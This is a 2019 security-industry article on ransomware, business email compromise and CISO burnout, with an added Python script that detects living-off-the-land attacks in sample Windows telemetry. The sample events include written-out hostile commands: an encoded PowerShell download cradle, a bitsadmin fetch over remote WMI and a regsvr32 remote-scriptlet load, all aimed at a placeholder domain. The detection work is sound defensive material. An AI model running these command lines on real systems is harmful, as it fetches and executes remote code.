Ransomware Reboot: Old Threats Return To Haunt Firms
In insight / By Phil Muncaster / 10 May 2019
The threat landscape is a messy and chaotic beast. Security vendors stop tens of billions of attacks each year and many more slip under the radar. Making sense of it all can be a difficult task, especially when IT security teams have the extra pressure of regulatory compliance and supporting digital transformation projects. The sheer variety of threats facing firms today compounds these challenges. Yet it’s important to craft a security strategy that will manage risk in whatever form it appears.
Despite recent reports of its decline, ransomware remains a large and growing threat, alongside Business Email Compromise (BEC) and other attack types, according to the latest FBI figures. That should serve as another wake-up call to organisations to ensure they have defence-in-depth measures across the entire IT infrastructure.
Behind The Headlines
Effective cybersecurity is all about the details. Sometimes that can make it dangerous to rely too heavily on vague media narratives. Over the past few months, report after report has claimed that ransomware is on the wane as cyber-criminals look to generate greater returns for less investment via crypto-jacking. Yet this isn’t the whole story.
In fact, ransomware losses associated with incidents reported to the FBI increased from $2.3m (£1.7m) in 2017 to $3.6m (£2.8m) last year. Even this is likely to be an underestimate, since the FBI's figure excludes lost business, wages, files, productivity and remediation costs. The trend is backed up by a new report from Malwarebytes, which claims that ransomware detections in Q1 2019 surged 195% from the previous quarter and more than 500% year-on-year.
That same report reveals a staggering 235% year-on-year increase in detected cyber-threats to businesses, as hackers increasingly turn their attention away from consumer targets. Detections of Trojan malware increased by more than 200% from the previous quarter and nearly 650% year-on-year.
The FBI has more. It reveals BEC to be the single biggest threat to organisations last year, in terms of associated losses. It accounted for a massive $1.3bn out of the total $2.7bn reported from global firms to the US law enforcement agency. Also singled out for attention are “payroll diversion” scams, in which an employee's credentials are phished to gain access to their payroll account; the attacker then changes the direct-deposit details so that wages flow to an account they control. Just 100 complaints to the FBI last year resulted in losses of $100m.
Threats Keep Evolving
Understanding the current state of the threat landscape is of course important for IT leaders. But it's also necessary to dig deeper, as the black hats are constantly refining their techniques. Ransomware, for example, is arguably getting more sophisticated and targeted, with strains such as SamSam and GandCrab using APT-like techniques to covertly gain access to privileged accounts before spreading. Fileless techniques are also increasingly common: rather than dropping custom binaries, attackers abuse legitimate built-in Windows tools to move through networks and install malware, which helps them stay under the radar.
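The living-off-the-land behaviour described above (native Windows tooling used to move laterally and stage malware) is what a detection engineer hunts for in process-creation telemetry. What follows is an added example, not code from the article or from any vendor report it cites: a handful of rules run over constructed process-creation events whose field names are modelled loosely on Sysmon Event ID 1 (hosts, users and URLs are invented), with PowerShell -EncodedCommand payloads decoded so the analyst sees the plaintext rather than a base64 blob.

```python
import base64
import re
from pathlib import PureWindowsPath

# Rule 1: Office applications should not spawn script hosts or shells.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
# The payload is base64 of a UTF-16LE string.
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def basename(path):
    """Lower-cased file name of a Windows path (works on bare names too)."""
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand payload, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Each rule is (name, predicate over one event dict).
RULES = [
    ("office_spawns_script_host", lambda ev:
        basename(ev["parent"]) in OFFICE_PARENTS
        and basename(ev["image"]) in SCRIPT_HOSTS),
    ("encoded_powershell", lambda ev:
        basename(ev["image"]) == "powershell.exe"
        and decode_encoded_command(ev["cmdline"]) is not None),
    # wmic /node:<host> process call create = remote execution over WMI.
    ("remote_wmi_process_create", lambda ev:
        basename(ev["image"]) == "wmic.exe"
        and bool(re.search(r"(?i)/node:\S+.*process\s+call\s+create", ev["cmdline"]))),
    # Built-in downloaders used to fetch a second stage.
    ("lolbin_download", lambda ev:
        bool(re.search(r"(?i)(bitsadmin\S*\s+/transfer|certutil\S*\s+.*-urlcache)",
                       ev["cmdline"]))),
    # regsvr32 loading a remote scriptlet via scrobj.dll.
    ("regsvr32_remote_scriptlet", lambda ev:
        basename(ev["image"]) == "regsvr32.exe"
        and bool(re.search(r"(?i)/i:https?://|scrobj\.dll", ev["cmdline"]))),
]


def analyze(event):
    """Names of all rules that fire for one process-creation event."""
    return [name for name, pred in RULES if pred(event)]


def scan(events):
    """(index, fired rules, decoded PowerShell or None) for each suspicious event."""
    findings = []
    for i, ev in enumerate(events):
        hits = analyze(ev)
        if hits:
            findings.append((i, hits, decode_encoded_command(ev["cmdline"])))
    return findings


# Constructed sample telemetry (not real logs). The encoded payload is built
# here so the decoder can be exercised end to end; example.invalid is a
# reserved, non-resolving domain.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
    .encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"host": "ws01", "user": "CORP\\alice", "parent": "winword.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + _ENCODED_PAYLOAD},
    {"host": "ws01", "user": "CORP\\alice", "parent": "powershell.exe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic /node:fs02 process call create \"cmd.exe /c bitsadmin "
                "/transfer j http://example.invalid/x.exe C:\\Users\\Public\\x.exe\""},
    {"host": "fs02", "user": "CORP\\svc_backup", "parent": "services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws07", "user": "CORP\\bob", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll"},
]

if __name__ == "__main__":
    for idx, hits, decoded in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{ev['host']}] {basename(ev['image'])} <- {ev['parent']}: {', '.join(hits)}")
        if decoded:
            print("    decoded:", decoded)
```

Each rule on its own is noisy in an environment where administrators legitimately use WMI or encoded commands; the value comes from the parent/child pairing and from the decoded command line, which is what lets an analyst tell a scripted backup from a download cradle. The regex in ENCODED_RE deliberately does not match -ExecutionPolicy, which also begins with -E.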
Even BEC tactics are evolving. Researchers have spotted attackers increasingly looking to scam their victims via mobile comms, rather than email. The immediacy of the communication method helps them to avoid scrutiny. If organisations nominally as tech-savvy as Google (£77m) and Facebook (£18m) can be caught out by BEC, then anyone can.
Of course, having good visibility into threats and your organisation’s IT environment is only half the battle. You then need to build a comprehensive risk-based cybersecurity strategy to preserve digital investments, corporate reputation and the bottom line. Unfortunately, not many firms are succeeding. A new report from insurer Hiscox finds that just 10% of firms in the US, UK, France, Germany, Spain, Belgium and the Netherlands can be classed as cyber readiness “experts”. The vast majority (75%) are mere “novices”, despite spending rising 24% on average year-on-year.
So how can you move from novice to expert? It’s not all about the size of financial investment but where and how it’s spent. The insurer was at pains to point out the importance of executive/board-level buy-in for cybersecurity programmes, a dedicated head of cyber, and the need for clear strategy featuring input from stakeholders across the business. Processes are also crucial — the ability to “track, document and measure impact” — as are employee training and awareness programmes.
A new report from Symantec warns that 82% of CISOs in the UK, France and Germany feel “burnt out” thanks to growing pressures from compliance, IT complexity and mounting threats. A majority are also thinking about leaving their job (64%) or quitting the industry altogether (63%). Given current skills shortages, organisations can ill afford a wave of early departures, quite apart from the fact that high stress tends to impair decision making.
Instead, boardrooms need to get behind the idea of cybersecurity as a competitive advantage and give their IT teams the resources they need to become strategic. After all, it's not just about blocking attacks: effective security is a vital prerequisite for growth.